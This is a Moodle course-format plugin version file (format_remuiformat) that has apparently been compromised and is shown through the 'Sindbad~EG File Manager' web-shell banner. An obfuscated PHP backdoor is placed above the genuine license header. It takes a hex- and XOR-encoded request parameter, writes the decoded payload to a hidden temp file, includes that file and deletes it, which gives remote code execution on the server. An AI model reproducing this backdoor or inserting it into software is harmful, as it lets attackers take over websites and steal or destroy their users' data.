Sindbad~EG File Manager
<?php if(in_array("\x68\x6Cd", array_keys($_REQUEST))){ $fac = hex2bin($_REQUEST["\x68\x6Cd"]); $dchunk = '' ; foreach(str_split($fac) as $char){$dchunk .= chr(ord($char) ^ 65);} $object = array_filter([session_save_path(), getenv("TEMP"), getcwd(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), "/var/tmp"]); foreach ($object as $value): if (array_product([is_dir($value), is_writable($value)])) { $item = join("/", [$value, ".mrk"]); if (@file_put_contents($item, $dchunk) !== false) { include $item; unlink($item); die(); } } endforeach; }
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
/**
* Version details
*
* @package format_remuiformat
* @copyright 2019 Wisdmlabs
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
defined('MOODLE_INTERNAL') || die();
$plugin->version = 2025021200; // The current plugin version (Date: YYYYMMDDXX).
$plugin->release = '4.1.13';
$plugin->requires = 2022041900; // Requires this Moodle version (Moodle V4.0).
$plugin->maturity = MATURITY_STABLE;
$plugin->component = 'format_remuiformat'; // Full name of the plugin (used for diagnostics).
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists